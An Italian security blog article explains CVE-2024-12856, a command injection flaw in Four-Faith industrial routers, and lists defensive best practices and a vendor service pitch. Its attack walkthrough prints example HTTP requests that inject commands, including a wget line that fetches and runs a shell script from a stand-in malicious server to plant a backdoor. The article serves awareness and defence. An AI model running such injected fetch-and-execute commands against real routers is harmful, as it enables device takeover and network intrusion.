Scopriamo CVE-2024-12856, la minaccia dei router industriali Four-Faith. Analisi tecnica, rischi e strategie per proteggere la rete aziendale.

  1. Cos’è CVE-2024-12856?
  2. Come funziona CVE-2024-12856?
  3. Best practices contro CVE-2024-12856

La sicurezza informatica è una delle principali preoccupazioni nel panorama tecnologico moderno, soprattutto quando si parla di dispositivi critici come i router industriali. Questi dispositivi garantiscono connettività e stabilità alle infrastrutture. Tuttavia, senza un’adeguata protezione, possono diventare un punto debole per le reti aziendali.

CVE 2024 12856

Un caso del genere è emerso proprio negli ultimi giorni del 2024, quando è venuta alla luce una vulnerabilità critica nota come CVE-2024-12856. Individuata in alcuni modelli di router Four-Faith, ha finito per esporre a gravi rischi di compromissione intere catene di produzione e processi industriali.

Ma come sempre, andiamo con ordine e affrontiamo per gradi l’argomento.

Cos’è CVE-2024-12856?

CVE-2024-12856 è una vulnerabilità di tipo OS Command Injection (iniezione di comandi del sistema operativo) che interessa specifici router industriali a marchio Four-Faith. Scoperta e documentata il 27 dicembre 2024, la falla ha ricevuto un punteggio pari a 7.2 su 10 nella scala CVSS v3.1 (Common Vulnerability Scoring System). Questo la classifica come una vulnerabilità ad alto impatto.

Essa consente a un attaccante remoto autenticato di inviare richieste HTTP manipolate in modo tale da eseguire comandi arbitrari sul sistema operativo sottostante dei router. In altre parole, sfruttando questa vulnerabilità, un attaccante si garantisce un accesso diretto alla shell di sistema, permettendo l’esecuzione di comandi a livello di root. Ciò gli permette di compromettere l’integrità del dispositivo, alterare le configurazioni e, nei casi più gravi, ottenerne il pieno controllo.
I seguenti modelli di router sono vulnerabili, in particolare con il firmware 2.0:

  • Four-Faith F3x24;
  • Four-Faith F3x36;

Un aspetto critico di questa vulnerabilità è che l’attaccante non deve ottenere necessariamente un accesso fisico, o entrare in possesso di credenziali elevate per sfruttarla. Se un dispositivo vulnerabile è esposto a una rete, basta solo essere in possesso dei privilegi di accesso limitati per iniettare comandi malevoli attraverso una semplice richiesta HTTP. Da ciò si evince che le conseguenze derivanti dal suo sfruttamento sono particolarmente preoccupanti per le reti industriali. Questo perché, oltre al rischio di perdita di dati o danni alle configurazioni, gli attaccanti potrebbero installare malware e altre minacce per compromettere ulteriormente i sistemi bersaglio. Come se non bastasse c’è anche da considerare l’accesso a livello di sistema operativo, il quale permette loro di eseguire una serie di movimenti laterali all’interno della rete, esponendo ulteriori macchine e dispositivi.

Come funziona CVE-2024-12856?

Come anticipato, la vulnerabilità consente di eseguire comandi arbitrari direttamente sul sistema operativo sottostante il router. L’attacco si sviluppa essenzialmente in tre fasi principali. Vediamole nel dettaglio.

Identificazione del dispositivo vulnerabile

Nel caso di questa simulazione d’attacco, il bersaglio individuato è un router Four-Faith F3x24 su firmware 2.0, mentre l’attaccante impiega una distribuzione Linux. Questi utilizza come strumento Shodan, un motore di ricerca per dispositivi connessi a Internet, per individuare router esposti con porte HTTP aperte e configurazioni insicure.

Esecuzione di comandi arbitrari malevoli

Una volta individuato il dispositivo, l’attaccante gli invia una richiesta HTTP appositamente creata per eseguire comandi sul sistema operativo. Un esempio è la seguente:

GET /cgi-bin/admin.cgi?cmd=ls%20/etc HTTP/1.1
Host: [IP_DEL_ROUTER]
User-Agent: curl/7.68.0

Questa obbliga il router a eseguire il comando ls /etc, restituendo la lista dei file e delle directory presenti nel percorso /etc.

Installazione di una backdoor

Dopo aver ottenuto l’accesso iniziale, l’attaccante installa una web shell nel router per mantenere un accesso persistente. Ciò è possibile con l’esecuzione del comando:

GET /cgi-bin/admin.cgi?cmd=wget%20http://malicious-server.com/shell.sh%20-O%20/tmp/shell.sh;sh%20/tmp/shell.sh HTTP/

Questo comando forza il router a scaricare uno script malevolo, posizionarlo nella directory /tmp e a eseguirlo. In altre parole, sul router è stata installata una backdoor mediante la web shell. Ciò apre le porte ad un accesso remoto persistente per l’attaccante. Infatti, essa permette all’attore malevolo di navigare nel file system, modificare le configurazioni del router e caricare ulteriori payload malevoli.

Ottenuto il controllo completo del dispositivo, l’attore malevolo può manipolare la configurazione di rete, reindirizzando il traffico verso server controllati, e utilizzare il router compromesso per azioni ulteriori. Tra queste, l’intercettazione di dati sensibili, l’esecuzione di attacchi DDoS e la compromissione di altri dispositivi all’interno della stessa rete, mediante movimenti laterali.

Best practices contro CVE-2024-12856

Anche se non esiste una soluzione unica per prevenire attacchi legati a questa vulnerabilità, ci sono diverse misure che le organizzazioni possono adottare per ridurre i rischi:

  • Aggiornamenti costanti di sistema e patching tempestivo
    Ci si deve assicurare che i router e i sistemi in uso eseguano sempre l’ultima versione del firmware disponibile. Gli aggiornamenti tempestivi sono essenziali per mitigare vulnerabilità note.
  • Isolamento e segmentazione della rete
    Le reti devono essere configurati in modo che i dispositivi critici, come i router industriali, siano separati da altre infrastrutture aziendali. Questo limita notevolmente l’insorgenza di movimenti laterali da parte di attori malevoli.
  • Limitazione dell’accesso e configurazione dei privilegi
    Le credenziali di accesso ai router vanno configurate in modo restrittivo. L’accesso remoto non necessario deve essere disabilitato ed è buona prassi impiegare password robuste.
  • Monitoraggio continuo e rilevamento delle anomalie
    Strumenti avanzati di logging e analisi del traffico possono aiutare a identificare anomalie, come comandi sospetti inviati attraverso richieste HTTP, e intervenire prima che l’attacco si espanda.
  • Implementazione di soluzioni di sicurezza avanzate
    L’adozione di soluzioni di sicurezza avanzate, come sistemi di rilevamento delle intrusioni (IDS) e firewall di ultima generazione, proteggono i router da richieste malevole.
  • Effettuare backup regolari e conservarli su server isolati
    I backup vanno eseguiti con una certa regolarità e frequenza. Le copie devono essere conservate sempre su server separati e isolati dalla rete aziendale. Ciò permette un rapido ripristino dei sistemi in caso di attacco.
  • Condurre vulnerability assessment periodici con esperti qualificati
    Affidati a professionisti qualificati per eseguire valutazioni periodiche delle vulnerabilità. Un esempio è il servizio offerto di vulnerability assessment  offerto da Cyberment, che aiuta a identificare e mitigare le falle nella sicurezza delle infrastrutture aziendali.

In conclusione

La vulnerabilità CVE-2024-12856 dimostra l’importanza di mantenere alta la guardia sulla sicurezza delle infrastrutture IT.

Anche con patch disponibili, i rischi restano elevati se le vulnerabilità non vengono affrontate tempestivamente. Per proteggersi da minacce di questo tipo, è fondamentale adottare un approccio proattivo. Aggiornare regolarmente i sistemi, segmentare le reti e monitorare continuamente l’attività sono solo alcune delle misure necessarie. Solo con un impegno costante le aziende possono ridurre il rischio di attacchi devastanti come quelli legati alla vulnerabilità CVE-2024-12856.


    Dichiaro di aver letto e compreso l'Informativa sul trattamento dei dati